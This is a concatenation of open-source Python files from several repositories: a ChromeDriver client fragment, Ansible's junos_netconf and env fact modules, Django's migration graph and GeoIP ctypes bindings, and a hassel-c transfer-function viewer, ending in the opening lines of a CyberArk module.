    params['sessionId'] = self._session_id
    response = self._ExecuteCommand(command, params)
    return self._UnwrapValue(response['value'])

  # --- Window handling ---

  def GetWindowHandles(self):
    return self.ExecuteCommand(Command.GET_WINDOW_HANDLES)

  def SwitchToWindow(self, handle_or_name):
    self.ExecuteCommand(Command.SWITCH_TO_WINDOW, {'name': handle_or_name})

  def GetCurrentWindowHandle(self):
    return self.ExecuteCommand(Command.GET_CURRENT_WINDOW_HANDLE)

  def CloseWindow(self):
    self.ExecuteCommand(Command.CLOSE)

  # --- Navigation and script execution ---

  def Load(self, url):
    self.ExecuteCommand(Command.GET, {'url': url})

  def LaunchApp(self, app_id):
    self.ExecuteCommand(Command.LAUNCH_APP, {'id': app_id})

  def ExecuteScript(self, script, *args):
    """Run synchronous JavaScript in the page; returns its value."""
    converted_args = list(args)
    return self.ExecuteCommand(
        Command.EXECUTE_SCRIPT, {'script': script, 'args': converted_args})

  def ExecuteAsyncScript(self, script, *args):
    """Run JavaScript that signals completion via a callback argument."""
    converted_args = list(args)
    return self.ExecuteCommand(
        Command.EXECUTE_ASYNC_SCRIPT,
        {'script': script, 'args': converted_args})

  def SwitchToFrame(self, id_or_name):
    self.ExecuteCommand(Command.SWITCH_TO_FRAME, {'id': id_or_name})

  def SwitchToFrameByIndex(self, index):
    self.SwitchToFrame(index)

  def SwitchToMainFrame(self):
    # The wire protocol treats a null frame id as the top-level frame.
    self.SwitchToFrame(None)

  def SwitchToParentFrame(self):
    self.ExecuteCommand(Command.SWITCH_TO_PARENT_FRAME)

  def GetSessions(self):
    return self.ExecuteCommand(Command.GET_SESSIONS)

  def GetTitle(self):
    return self.ExecuteCommand(Command.GET_TITLE)

  def GetPageSource(self):
    return self.ExecuteCommand(Command.GET_PAGE_SOURCE)

  def FindElement(self, strategy, target):
    return self.ExecuteCommand(
        Command.FIND_ELEMENT, {'using': strategy, 'value': target})

  def FindElements(self, strategy, target):
    return self.ExecuteCommand(
        Command.FIND_ELEMENTS, {'using': strategy, 'value': target})

  def SetTimeout(self, type, timeout):
    # `type` shadows the builtin but is kept for caller compatibility.
    return self.ExecuteCommand(
        Command.SET_TIMEOUT, {'type' : type, 'ms': timeout})

  def GetCurrentUrl(self):
    return self.ExecuteCommand(Command.GET_CURRENT_URL)

  def GoBack(self):
    return self.ExecuteCommand(Command.GO_BACK)

  def GoForward(self):
    return self.ExecuteCommand(Command.GO_FORWARD)

  def Refresh(self):
    return self.ExecuteCommand(Command.REFRESH)

  # --- Mouse and touch input ---

  def MouseMoveTo(self, element=None, x_offset=None, y_offset=None):
    """Move the mouse; offsets are relative to *element* when given."""
    params = {}
    if element is not None:
      params['element'] = element._id
    if x_offset is not None:
      params['xoffset'] = x_offset
    if y_offset is not None:
      params['yoffset'] = y_offset
    self.ExecuteCommand(Command.MOUSE_MOVE_TO, params)

  def MouseClick(self, button=0):
    self.ExecuteCommand(Command.MOUSE_CLICK, {'button': button})

  def MouseButtonDown(self, button=0):
    self.ExecuteCommand(Command.MOUSE_BUTTON_DOWN, {'button': button})

  def MouseButtonUp(self, button=0):
    self.ExecuteCommand(Command.MOUSE_BUTTON_UP, {'button': button})

  def MouseDoubleClick(self, button=0):
    self.ExecuteCommand(Command.MOUSE_DOUBLE_CLICK, {'button': button})

  def TouchDown(self, x, y):
    self.ExecuteCommand(Command.TOUCH_DOWN, {'x': x, 'y': y})

  def TouchUp(self, x, y):
    self.ExecuteCommand(Command.TOUCH_UP, {'x': x, 'y': y})

  def TouchMove(self, x, y):
    self.ExecuteCommand(Command.TOUCH_MOVE, {'x': x, 'y': y})

  def TouchScroll(self, element, xoffset, yoffset):
    params = {'element': element._id, 'xoffset': xoffset, 'yoffset': yoffset}
    self.ExecuteCommand(Command.TOUCH_SCROLL, params)

  def TouchFlick(self, element, xoffset, yoffset, speed):
    params = {
        'element': element._id,
        'xoffset': xoffset,
        'yoffset': yoffset,
        'speed': speed
    }
    self.ExecuteCommand(Command.TOUCH_FLICK, params)

  def TouchPinch(self, x, y, scale):
    params = {'x': x, 'y': y, 'scale': scale}
    self.ExecuteCommand(Command.TOUCH_PINCH, params)

  # --- Cookies ---

  def GetCookies(self):
    return self.ExecuteCommand(Command.GET_COOKIES)

  def AddCookie(self, cookie):
    self.ExecuteCommand(Command.ADD_COOKIE, {'cookie': cookie})

  def DeleteCookie(self, name):
    self.ExecuteCommand(Command.DELETE_COOKIE, {'name': name})

  def DeleteAllCookies(self):
    self.ExecuteCommand(Command.DELETE_ALL_COOKIES)

  # --- Alerts ---

  def IsAlertOpen(self):
    return self.ExecuteCommand(Command.GET_ALERT)

  def GetAlertMessage(self):
    return self.ExecuteCommand(Command.GET_ALERT_TEXT)

  def HandleAlert(self, accept, prompt_text=''):
    """Accept or dismiss the current alert, optionally typing prompt text."""
    if prompt_text:
      self.ExecuteCommand(Command.SET_ALERT_VALUE, {'text': prompt_text})
    if accept:
      cmd = Command.ACCEPT_ALERT
    else:
      cmd = Command.DISMISS_ALERT
    self.ExecuteCommand(cmd)

  def IsLoading(self):
    return self.ExecuteCommand(Command.IS_LOADING)

  # --- Window geometry ---

  def GetWindowPosition(self):
    position = self.ExecuteCommand(Command.GET_WINDOW_POSITION,
                                   {'windowHandle': 'current'})
    return [position['x'], position['y']]

  def SetWindowPosition(self, x, y):
    self.ExecuteCommand(Command.SET_WINDOW_POSITION,
                        {'windowHandle': 'current', 'x': x, 'y': y})

  def GetWindowSize(self):
    size = self.ExecuteCommand(Command.GET_WINDOW_SIZE,
                               {'windowHandle': 'current'})
    return [size['width'], size['height']]

  def SetWindowSize(self, width, height):
    self.ExecuteCommand(
        Command.SET_WINDOW_SIZE,
        {'windowHandle': 'current', 'width': width, 'height': height})

  def MaximizeWindow(self):
    self.ExecuteCommand(Command.MAXIMIZE_WINDOW, {'windowHandle': 'current'})

  def Quit(self):
    """Quits the browser and ends the session."""
    self.ExecuteCommand(Command.QUIT)

  # --- Logging and network conditions ---

  def GetLog(self, type):
    return self.ExecuteCommand(Command.GET_LOG, {'type': type})

  def GetAvailableLogTypes(self):
    return self.ExecuteCommand(Command.GET_AVAILABLE_LOG_TYPES)

  def IsAutoReporting(self):
    return self.ExecuteCommand(Command.IS_AUTO_REPORTING)

  def SetAutoReporting(self, enabled):
    self.ExecuteCommand(Command.SET_AUTO_REPORTING, {'enabled': enabled})

  def SetNetworkConditions(self, latency, download_throughput,
                           upload_throughput, offline=False):
    # Until http://crbug.com/456324 is resolved, we'll always set 'offline' to
    # False, as going "offline" will sever Chromedriver's connection to Chrome.
    params = {
        'network_conditions': {
            'offline': offline,
            'latency': latency,
            'download_throughput': download_throughput,
            'upload_throughput': upload_throughput
        }
    }
    self.ExecuteCommand(Command.SET_NETWORK_CONDITIONS, params)

  def SetNetworkConditionsName(self, network_name):
    self.ExecuteCommand(
        Command.SET_NETWORK_CONDITIONS, {'network_name': network_name})

  def GetNetworkConditions(self):
    conditions = self.ExecuteCommand(Command.GET_NETWORK_CONDITIONS)
    return {
        'latency': conditions['latency'],
        'download_throughput': conditions['download_throughput'],
        'upload_throughput': conditions['upload_throughput'],
        'offline': conditions['offline']
    }

  def DeleteNetworkConditions(self):
    self.ExecuteCommand(Command.DELETE_NETWORK_CONDITIONS)
| bsd-3-clause |
bsmr-ansible/ansible-modules-core | network/junos/junos_netconf.py | 25 | 3772 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: junos_netconf
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Configures the Junos Netconf system service
description:
- This module provides an abstraction that enables and configures
the netconf system service running on Junos devices. This module
can be used to easily enable the Netconf API. Netconf provides
a programmatic interface for working with configuration and state
resources as defined in RFC 6242.
extends_documentation_fragment: junos
options:
listens_on:
description:
- This argument specifies the port the netconf service should
listen on for SSH connections. The default port as defined
in RFC 6242 is 830.
required: true
default: 830
state:
description:
- Specifies the state of the M(junos_netconf) resource on
the remote device. If the O(state) argument is set to
I(present) the netconf service will be configured. If the
O(state) argument is set to I(absent) the netconf service
will be removed from the configuration.
required: true
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: enable netconf service on port 830
junos_netconf:
listens_on: 830
state: present
- name: disable netconf service
junos_netconf:
state: absent
"""
RETURN = """
"""
import re
def parse_port(config):
    """Extract the netconf SSH port from device config text, or None."""
    port_match = re.search(r'port (\d+)', config)
    return int(port_match.group(1)) if port_match else None
def get_instance(module):
    """Return the current netconf service state from the device.

    Runs `show configuration system services netconf` over the module's
    connection and returns {'state': 'absent'} when nothing is configured,
    or {'state': 'present', 'port': <int or None>} when the service exists.
    A None port means no explicit `port` statement was found in the output.
    """
    cmd = 'show configuration system services netconf'
    cfg = module.run_commands(cmd)[0]
    # Empty output means the netconf stanza is absent from the config.
    result = dict(state='absent')
    if cfg:
        result = dict(state='present')
        result['port'] = parse_port(cfg)
    return result
def main():
    """main entry point for module execution

    Compares the desired state against the device's current netconf
    configuration and applies at most one config command to converge,
    honoring check mode.
    """
    argument_spec = dict(
        listens_on=dict(type='int', default=830),
        state=dict(default='present', choices=['present', 'absent']),
        transport=dict(default='cli', choices=['cli'])
    )

    module = get_module(argument_spec=argument_spec,
                        supports_check_mode=True)

    state = module.params['state']
    port = module.params['listens_on']

    result = dict(changed=False)

    instance = get_instance(module)

    commands = None
    if state == 'present' and instance.get('state') == 'absent':
        # Service missing entirely: enable it on the requested port.
        commands = 'set system services netconf ssh port %s' % port
    elif state == 'absent' and instance.get('state') == 'present':
        commands = 'delete system services netconf'
    elif state == 'present' and port != instance.get('port'):
        # Bug fix: this branch previously lacked the state check, so a
        # `state: absent` run against an already-absent service compared
        # the port against None and *configured* netconf instead of
        # leaving it removed.
        commands = 'set system services netconf ssh port %s' % port

    if commands:
        if not module.check_mode:
            comment = 'configuration updated by junos_netconf'
            module.connection.configure(commands, comment=comment)
        result['changed'] = True

    module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.shell import *
from ansible.module_utils.junos import *
if __name__ == '__main__':
main()
| gpl-3.0 |
henryfjordan/django | django/db/migrations/graph.py | 351 | 10956 | from __future__ import unicode_literals
import warnings
from collections import deque
from functools import total_ordering
from django.db.migrations.state import ProjectState
from django.utils.datastructures import OrderedSet
from django.utils.encoding import python_2_unicode_compatible
from .exceptions import CircularDependencyError, NodeNotFoundError
RECURSION_DEPTH_WARNING = (
"Maximum recursion depth exceeded while generating migration graph, "
"falling back to iterative approach. If you're experiencing performance issues, "
"consider squashing migrations as described at "
"https://docs.djangoproject.com/en/dev/topics/migrations/#squashing-migrations."
)
@python_2_unicode_compatible
@total_ordering
class Node(object):
    """
    A single node in the migration graph. Contains direct links to adjacent
    nodes in either direction.
    """
    def __init__(self, key):
        # key is the (app_label, migration_name) tuple identifying this node.
        self.key = key
        self.children = set()
        self.parents = set()

    def __eq__(self, other):
        # A Node compares equal to its key; Node-to-Node equality still works
        # through Python's reflected comparison, so keys and Nodes can be
        # used interchangeably in sets and dict lookups.
        return self.key == other

    def __lt__(self, other):
        # total_ordering derives the remaining comparisons from this + __eq__.
        return self.key < other

    def __hash__(self):
        # Hash by key, consistent with __eq__ above.
        return hash(self.key)

    def __getitem__(self, item):
        # Tuple-style indexing, e.g. node[0] -> app label.
        return self.key[item]

    def __str__(self):
        return str(self.key)

    def __repr__(self):
        return '<Node: (%r, %r)>' % self.key

    def add_child(self, child):
        self.children.add(child)

    def add_parent(self, parent):
        self.parents.add(parent)

    # Use manual caching, @cached_property effectively doubles the
    # recursion depth for each recursion.
    def ancestors(self):
        """Return a deduplicated list of ancestor keys (computed recursively
        over sorted parents), ending with this node's own key."""
        # Use self.key instead of self to speed up the frequent hashing
        # when constructing an OrderedSet.
        if '_ancestors' not in self.__dict__:
            ancestors = deque([self.key])
            for parent in sorted(self.parents):
                # extendleft reverses its input, so reversed(...) preserves
                # each parent's ancestor ordering while prepending it.
                ancestors.extendleft(reversed(parent.ancestors()))
            self.__dict__['_ancestors'] = list(OrderedSet(ancestors))
        return self.__dict__['_ancestors']

    # Use manual caching, @cached_property effectively doubles the
    # recursion depth for each recursion.
    def descendants(self):
        """Return a deduplicated list of descendant keys (computed recursively
        over sorted children), ending with this node's own key."""
        # Use self.key instead of self to speed up the frequent hashing
        # when constructing an OrderedSet.
        if '_descendants' not in self.__dict__:
            descendants = deque([self.key])
            for child in sorted(self.children):
                descendants.extendleft(reversed(child.descendants()))
            self.__dict__['_descendants'] = list(OrderedSet(descendants))
        return self.__dict__['_descendants']
@python_2_unicode_compatible
class MigrationGraph(object):
    """
    Represents the digraph of all migrations in a project.
    Each migration is a node, and each dependency is an edge. There are
    no implicit dependencies between numbered migrations - the numbering is
    merely a convention to aid file listing. Every new numbered migration
    has a declared dependency to the previous number, meaning that VCS
    branch merges can be detected and resolved.
    Migrations files can be marked as replacing another set of migrations -
    this is to support the "squash" feature. The graph handler isn't responsible
    for these; instead, the code to load them in here should examine the
    migration files and if the replaced migrations are all either unapplied
    or not present, it should ignore the replaced ones, load in just the
    replacing migration, and repoint any dependencies that pointed to the
    replaced migrations to point to the replacing one.
    A node should be a tuple: (app_path, migration_name). The tree special-cases
    things within an app - namely, root nodes and leaf nodes ignore dependencies
    to other apps.
    """
    def __init__(self):
        # node_map: key -> Node wrapper (graph structure);
        # nodes: key -> the Migration implementation object.
        self.node_map = {}
        self.nodes = {}
        # True once any Node has cached its ancestors/descendants.
        self.cached = False
    def add_node(self, key, implementation):
        # Register a migration under its (app_label, migration_name) key.
        node = Node(key)
        self.node_map[key] = node
        self.nodes[key] = implementation
        self.clear_cache()
    def add_dependency(self, migration, child, parent):
        # Add a child-depends-on-parent edge; both endpoints must exist.
        if child not in self.nodes:
            raise NodeNotFoundError(
                "Migration %s dependencies reference nonexistent child node %r" % (migration, child),
                child
            )
        if parent not in self.nodes:
            raise NodeNotFoundError(
                "Migration %s dependencies reference nonexistent parent node %r" % (migration, parent),
                parent
            )
        self.node_map[child].add_parent(self.node_map[parent])
        self.node_map[parent].add_child(self.node_map[child])
        self.clear_cache()
    def clear_cache(self):
        # Drop every Node's memoized ancestry; called whenever the graph
        # shape changes so stale plans are never returned.
        if self.cached:
            for node in self.nodes:
                self.node_map[node].__dict__.pop('_ancestors', None)
                self.node_map[node].__dict__.pop('_descendants', None)
            self.cached = False
    def forwards_plan(self, target):
        """
        Given a node, returns a list of which previous nodes (dependencies)
        must be applied, ending with the node itself.
        This is the list you would follow if applying the migrations to
        a database.
        """
        if target not in self.nodes:
            raise NodeNotFoundError("Node %r not a valid node" % (target, ), target)
        # Use parent.key instead of parent to speed up the frequent hashing in ensure_not_cyclic
        self.ensure_not_cyclic(target, lambda x: (parent.key for parent in self.node_map[x].parents))
        self.cached = True
        node = self.node_map[target]
        try:
            return node.ancestors()
        except RuntimeError:
            # fallback to iterative dfs
            warnings.warn(RECURSION_DEPTH_WARNING, RuntimeWarning)
            return self.iterative_dfs(node)
    def backwards_plan(self, target):
        """
        Given a node, returns a list of which dependent nodes (dependencies)
        must be unapplied, ending with the node itself.
        This is the list you would follow if removing the migrations from
        a database.
        """
        if target not in self.nodes:
            raise NodeNotFoundError("Node %r not a valid node" % (target, ), target)
        # Use child.key instead of child to speed up the frequent hashing in ensure_not_cyclic
        self.ensure_not_cyclic(target, lambda x: (child.key for child in self.node_map[x].children))
        self.cached = True
        node = self.node_map[target]
        try:
            return node.descendants()
        except RuntimeError:
            # fallback to iterative dfs
            warnings.warn(RECURSION_DEPTH_WARNING, RuntimeWarning)
            return self.iterative_dfs(node, forwards=False)
    def iterative_dfs(self, start, forwards=True):
        """
        Iterative depth first search, for finding dependencies.
        """
        # Used only when the recursive Node caches blow the recursion limit;
        # must produce the same ordering as Node.ancestors()/descendants().
        visited = deque()
        visited.append(start)
        if forwards:
            stack = deque(sorted(start.parents))
        else:
            stack = deque(sorted(start.children))
        while stack:
            node = stack.popleft()
            visited.appendleft(node)
            if forwards:
                children = sorted(node.parents, reverse=True)
            else:
                children = sorted(node.children, reverse=True)
            # reverse sorting is needed because prepending using deque.extendleft
            # also effectively reverses values
            stack.extendleft(children)
        return list(OrderedSet(visited))
    def root_nodes(self, app=None):
        """
        Returns all root nodes - that is, nodes with no dependencies inside
        their app. These are the starting point for an app.
        """
        roots = set()
        for node in self.nodes:
            # Cross-app parents are deliberately ignored (key[0] is app_label).
            if (not any(key[0] == node[0] for key in self.node_map[node].parents)
                    and (not app or app == node[0])):
                roots.add(node)
        return sorted(roots)
    def leaf_nodes(self, app=None):
        """
        Returns all leaf nodes - that is, nodes with no dependents in their app.
        These are the "most current" version of an app's schema.
        Having more than one per app is technically an error, but one that
        gets handled further up, in the interactive command - it's usually the
        result of a VCS merge and needs some user input.
        """
        leaves = set()
        for node in self.nodes:
            # Cross-app children are deliberately ignored (key[0] is app_label).
            if (not any(key[0] == node[0] for key in self.node_map[node].children)
                    and (not app or app == node[0])):
                leaves.add(node)
        return sorted(leaves)
    def ensure_not_cyclic(self, start, get_children):
        # Algo from GvR:
        # http://neopythonic.blogspot.co.uk/2009/01/detecting-cycles-in-directed-graph.html
        # Iterative cycle detection over the whole graph; raises
        # CircularDependencyError naming the cycle's members.
        todo = set(self.nodes)
        while todo:
            node = todo.pop()
            stack = [node]
            while stack:
                top = stack[-1]
                for node in get_children(top):
                    if node in stack:
                        cycle = stack[stack.index(node):]
                        raise CircularDependencyError(", ".join("%s.%s" % n for n in cycle))
                    if node in todo:
                        stack.append(node)
                        todo.remove(node)
                        break
                else:
                    node = stack.pop()
    def __str__(self):
        return 'Graph: %s nodes, %s edges' % self._nodes_and_edges()
    def __repr__(self):
        nodes, edges = self._nodes_and_edges()
        return '<%s: nodes=%s, edges=%s>' % (self.__class__.__name__, nodes, edges)
    def _nodes_and_edges(self):
        # Edge count is the sum of parent links; each dependency is one edge.
        return len(self.nodes), sum(len(node.parents) for node in self.node_map.values())
    def make_state(self, nodes=None, at_end=True, real_apps=None):
        """
        Given a migration node or nodes, returns a complete ProjectState for it.
        If at_end is False, returns the state before the migration has run.
        If nodes is not provided, returns the overall most current project state.
        """
        if nodes is None:
            nodes = list(self.leaf_nodes())
        if len(nodes) == 0:
            return ProjectState()
        if not isinstance(nodes[0], tuple):
            # A single node was passed in; normalize to a list of nodes.
            nodes = [nodes]
        plan = []
        for node in nodes:
            for migration in self.forwards_plan(node):
                if migration not in plan:
                    if not at_end and migration in nodes:
                        # Stop just before the target migration itself.
                        continue
                    plan.append(migration)
        project_state = ProjectState(real_apps=real_apps)
        for node in plan:
            project_state = self.nodes[node].mutate_state(project_state, preserve=False)
        return project_state
    def __contains__(self, node):
        return node in self.nodes
| bsd-3-clause |
probablytom/tomwallis.net | venv/lib/python2.7/site-packages/django/contrib/gis/geoip/prototypes.py | 93 | 3944 | from ctypes import c_char_p, c_float, c_int, string_at, Structure, POINTER
from django.contrib.gis.geoip.libgeoip import lgeoip, free
#### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
    """ctypes mirror of the C library's GeoIPRecord struct (city lookups)."""
    # Field names, order, and types must match the C struct layout exactly.
    _fields_ = [('country_code', c_char_p),
                ('country_code3', c_char_p),
                ('country_name', c_char_p),
                ('region', c_char_p),
                ('city', c_char_p),
                ('postal_code', c_char_p),
                ('latitude', c_float),
                ('longitude', c_float),
                # TODO: In 1.4.6 this changed from `int dma_code;` to
                # `union {int metro_code; int dma_code;};`. Change
                # to a `ctypes.Union` in to accommodate in future when
                # pre-1.4.6 versions are no longer distributed.
                ('dma_code', c_int),
                ('area_code', c_int),
                ('charset', c_int),
                ('continent_code', c_char_p),
                ]
# Names of the string-valued record fields; these get decoded after a lookup.
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
GEOIP_DEFAULT_ENCODING = 'iso-8859-1'
# Maps the C library's charset codes (record.charset) to Python codec names.
geoip_encodings = {
    0: 'iso-8859-1',
    1: 'utf8',
}
class GeoIPTag(Structure):
    # Opaque handle for the C library's database object; only ever used
    # through POINTER(GeoIPTag), so no fields are declared.
    pass
# Pointer typedefs used by the function prototypes below.
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
#### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
    GeoIP_lib_version = lgeoip.GeoIP_lib_version
    GeoIP_lib_version.argtypes = None
    GeoIP_lib_version.restype = c_char_p
else:
    # Older library build: callers must cope with the missing symbol.
    GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
def check_record(result, func, cargs):
    """
    ctypes errcheck callback for record lookups: turn a GeoIPRecord pointer
    into a plain dict (decoding string fields per the record's charset) and
    free the underlying C struct. Returns None for a NULL result pointer.
    """
    if not result:
        return None
    struct_data = result.contents
    record = {field: getattr(struct_data, field)
              for field, _ctype in struct_data._fields_}
    # Decode the string fields using the encoding the C library reported.
    encoding = geoip_encodings[record['charset']]
    for field in geoip_char_fields:
        raw = record[field]
        if raw:
            record[field] = raw.decode(encoding)
    # Free the memory allocated for the struct & return.
    GeoIPRecord_delete(result)
    return record
def record_output(func):
    # Configure a C function that returns a GeoIPRecord pointer: it takes
    # (database handle, query string) and routes results through check_record,
    # so Python callers receive a dict (or None) instead of a raw pointer.
    func.argtypes = [DBTYPE, c_char_p]
    func.restype = RECTYPE
    func.errcheck = check_record
    return func
# City-level lookup entry points; results flow through check_record.
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python: subclassing
# c_char_p prevents ctypes from auto-converting the result to bytes, so
# check_string still receives the raw pointer it must free().
class geoip_char_p(c_char_p):
    pass
def check_string(result, func, cargs):
    """
    ctypes errcheck callback: copy a C string result into Python, free the
    C allocation, and decode it with the default GeoIP encoding.
    """
    raw = ''
    if result:
        raw = string_at(result)
        # The library allocated this string; we own it and must free it.
        free(result)
    return raw.decode(GEOIP_DEFAULT_ENCODING)
# Database metadata string; the returned C pointer is freed in check_string.
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
    """
    Configure a C function that returns a borrowed C string: successful
    results are decoded from the default GeoIP encoding, NULL results are
    passed through unchanged.
    """
    def _decode_result(result, func, cargs):
        return result.decode(GEOIP_DEFAULT_ENCODING) if result else result
    func.restype = c_char_p
    func.errcheck = _decode_result
    return func
# Country-level lookups returning plain (decoded) strings.
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
| artistic-2.0 |
Br1an6/ACS_Netplumber_Implementation | hassel-c/tfmod.py | 7 | 3748 | #!/usr/bin/python
import argparse
import json
import os
from config_parser.transfer_function_to_openflow import OpenFlow_Rule_Generator
from config_parser.cisco_router_parser import cisco_router
from headerspace.tf import TF
from utils.wildcard_utils import set_header_field
from utils.wildcard import wildcard_create_bit_repeat
from utils.helper import dotted_subnet_to_int
# Port-type offsets the Cisco parser folds into numeric port IDs: output
# ports and intermediate ports occupy distinct numeric ranges.
OUTPORT_CONST = cisco_router.OUTPUT_PORT_TYPE_CONST * cisco_router.PORT_TYPE_MULTIPLIER
INTER_CONST = cisco_router.INTERMEDIATE_PORT_TYPE_CONST * cisco_router.PORT_TYPE_MULTIPLIER
def get_fwd_port_id(a_port):
    # Strip the port-local portion, leaving the switch's forwarding-engine ID.
    return int(a_port / cisco_router.SWITCH_ID_MULTIPLIER) * cisco_router.SWITCH_ID_MULTIPLIER
ofg = OpenFlow_Rule_Generator(None,cisco_router.HS_FORMAT())
def get_openflow_rule(rule,inv_mapf):
    # Render a transfer-function rule as a one-line OpenFlow-style string,
    # translating numeric port IDs back to names through inv_mapf.
    in_ports = "in_ports:"
    for p in rule["in_ports"]:
        in_ports = in_ports + inv_mapf[p] + ","
    # NOTE(review): when rule["in_ports"] is empty this slice strips the
    # trailing ':' instead of a ',' -- presumably rules printed here always
    # have at least one input port; confirm against callers.
    in_ports = in_ports[0:-1]
    out_ports = "out_ports:"
    if len(rule["out_ports"]) > 0:
        for p in rule["out_ports"]:
            out_ports = out_ports + inv_mapf[p] + ","
    else:
        out_ports = out_ports + "None,"
    out_ports = out_ports[0:-1]
    of_rule = ofg.parse_rule(rule)
    (match,rw) = ofg.pretify(of_rule)
    return "%s%s; %s%s;"%(match,in_ports,rw,out_ports)
def get_stage(rule):
    # Classify a rule by which pipeline stage its input ports belong to:
    # 'in' (input table), 'mid' (forwarding engine), or 'out' (output table),
    # based on where the port ID falls within the switch's numeric ranges.
    if len(rule["in_ports"]) == 0:
        return "in"
    sample = rule["in_ports"][0]
    if sample % cisco_router.SWITCH_ID_MULTIPLIER == 0:
        return "mid"
    elif sample % cisco_router.SWITCH_ID_MULTIPLIER < cisco_router.PORT_TYPE_MULTIPLIER:
        return "in"
    else:
        return "out"
# Command-line driver: loads the port map and all *.tf.json transfer
# functions from --data_path, then acts on the requested router.
# NOTE(review): only --view is implemented below; --delete and --add are
# declared but never handled -- confirm whether that is intentional.
parser = argparse.ArgumentParser(description='Command line tool to view/edit transfer functions')
parser.add_argument('rtr_name',
                    help='name of the router to work on its transfer function.')
parser.add_argument("--view", nargs=1, metavar=('table'),
                    help="view rules in table (table: in/mid/out).")
parser.add_argument("--delete", nargs=2, metavar=('table','rule_index'),
                    help="delete rule_index from table (table: in/mid/out).")
parser.add_argument("--add", nargs=3, metavar=('table','rule_index','rule'),
                    help="add to table a rule at index rule_index. rule is a\
 comma separated list of field=value or new_filed=new_value.\
 example: in_port=te1/1:te2/2,ip_dst=10.0.1.0/24,new_vlan=10,out_port=te1/2.\
 field can be vlan, ip_src, ip_dst, ip_proto, transport_src, trnsport_dst.\
 in_port and out_port specify the input and output ports, separated by a column.\
 table is either in,mid or out.")
parser.add_argument("-m", "--map_file", default="port_map.json",
                    help="Port map file name.")
parser.add_argument("-p", "--data_path", default=".",
                    help="Path to where the json transfer function files are stored")
args = parser.parse_args()
# Build the inverse port map: numeric port ID -> "router-port" name, with
# extra entries for the output (+OUTPORT_CONST) and intermediate
# (+INTER_CONST) variants and the per-switch forwarding engine.
f = open("%s/%s"%(args.data_path,args.map_file),'r')
mapf = json.load(f)
inv_mapf = {}
for rtr in mapf:
    for port in mapf[rtr]:
        inv_mapf[int(mapf[rtr][port])] = "%s-%s"%(rtr,port)
        inv_mapf[int(mapf[rtr][port])+OUTPORT_CONST] = "%s-%s"%(rtr,port)
        inv_mapf[int(mapf[rtr][port])+INTER_CONST] = "^%s-%s"%(rtr,port)
        fwd_id = get_fwd_port_id(int(mapf[rtr][port]))
        inv_mapf[fwd_id] = "FWD-ENGINE"
# Load every transfer function in the data directory, keyed by router name
# (filename minus the ".tf.json" suffix).
tfs = {}
files_in_dir = os.listdir(args.data_path)
for file_in_dir in files_in_dir:
    if file_in_dir.endswith(".tf.json"):
        tf = TF(1)
        tf.load_from_json("%s/%s"%(args.data_path,file_in_dir))
        tfs[file_in_dir[0:-8]] = tf
if args.view:
    # Print the requested router's rules for the chosen stage, numbered.
    f = tfs[args.rtr_name]
    stage = args.view[0]
    i = 1
    for rule in f.rules:
        if stage == get_stage(rule):
            print i,":",get_openflow_rule(rule,inv_mapf)
            i = i + 1;
MihaiMoldovanu/ansible | lib/ansible/module_utils/facts/system/env.py | 232 | 1170 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.module_utils.six import iteritems
from ansible.module_utils.facts.collector import BaseFactCollector
class EnvFactCollector(BaseFactCollector):
    """Fact collector exposing the process environment as the 'env' fact."""
    name = 'env'
    _fact_ids = set()

    def collect(self, module=None, collected_facts=None):
        # Snapshot os.environ into a plain dict so the fact set is detached
        # from the live environment mapping.
        environment = dict(
            (variable, value) for variable, value in iteritems(os.environ)
        )
        return {'env': environment}
| gpl-3.0 |
sogelink/ansible | lib/ansible/modules/identity/cyberark/cyberark_authentication.py | 83 | 10846 | #!/usr/bin/python
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
